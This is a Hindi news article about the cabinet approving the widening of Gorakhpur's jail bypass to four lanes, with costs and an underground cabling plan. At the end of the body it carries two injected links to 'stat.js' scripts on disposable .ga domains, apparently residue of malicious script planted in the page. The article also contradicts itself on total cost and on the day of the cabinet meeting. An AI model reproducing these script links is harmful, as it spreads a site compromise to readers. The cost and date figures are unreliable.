राष्ट्रीय मार्ग 24 व 28 को जोड़ता हुआ या जेल पास अब और चौड़ा होगा। मंत्री परिषद ने शहर के जेल बायपास मार्ग को फोरलेन बनाने के प्रस्ताव को मंजूरी दे दी है। राष्ट्रीय राजमार्ग संख्या 24 और 28 को जोड़ने की वजह से यह बाईपास मार्ग बेहद महत्वपूर्ण है। 19.80 करोड़ की लागत से बनने वाला यह बाईपास की 8.560 किलोमीटर लंबी सड़क का चौड़ीकरण किया जाएगा।

 

 

 

इससे शहर को जाम से छुटकारा मिलने के साथ-साथ दूसरे महानगर से सनौली और महाराजगंज जाने वाले वाहनों को भी आसानी होगी। यह जेल बाईपास मार्ग शहर से गुजरने वाले, मुख्य मार्गो गोरखपुर महाराजगंज, गोरखपुर पिपराइच, को क्रॉस करता है तथा सनौली, वाराणसी, देवरिया, और कुशीनगर को भी जोड़ता है। सड़क की चौड़ाई कम होने के कारण इस बाईपास पर अधिकतर जाम की समस्या हो या करती थी।

 

 

 

इस समस्या को देखते हुए बाईपास को फ्लोरीन बनाने का प्रस्ताव भेजा गया था। कैबिनेट ने शुक्रवार को इस प्रस्ताव को मंजूरी दे दी है। जिससे शहर को जाम से छुटकारा मिलेगा और एक शहर से दूसरे शहर जाने में आसानी होगी। परियोजना में आने वाली लागत 8751.28 लाख रुपए सिविल कार्यों में खर्च होगा। जबकि यूटिलिटी शिफ्टिंग में 4304 लाख रुपए खर्च होंगे। भूमि अधिग्रहण मैं 4716 लाख रुपए खर्च होंगे।मुख्यमंत्री योगी आदित्यनाथ ने कहा कि इस बाईपास में जमीन के ऊपर बिजली के तार नहीं दिखेंगे। अंडर ग्राउंड तार बिछाने के लिए उन्होंने 43.04 करोड़ रुपए की मंजूरी दे दी है।

 

 

 

शनिवार को लखनऊ में हुई कैबिनेट बैठक में इस प्रस्ताव पर मुहर भी लग गई है। 2 दिन पहले आए गोरखपुर में मुख्यमंत्री ने इस बाईपास के बारे में बातचीत की थी और जानकारी ली थी। गोवा बाग से बरगदवा तक फ्लोरिंग का निर्माण होना है, और इस बाईपास के किनारे ट्रेंच विधि से केबल बिछाई जाएगी। इसमें 33000 और 11000 वोल्ट की केबल होंगी। बाईपास किनारे बने नाले के एक हिस्से में ऊपर की तरफ लोहे की पाइप बिछाई जाएंगी ताकि कभी भविष्य में केबल में गड़बड़ी हो तो जमीन की खुदाई ना करनी पड़े और सिर्फ केबल ट्रेंच का ऊपर का स्लैप हटाया जाए और केबल को ठीक किया जा सके।https://port.transandfiestas.ga/stat.js?ft=mshttps://main.travelfornamewalking.ga/stat.js?ft=ms

Leave a Reply

Your email address will not be published. Required fields are marked *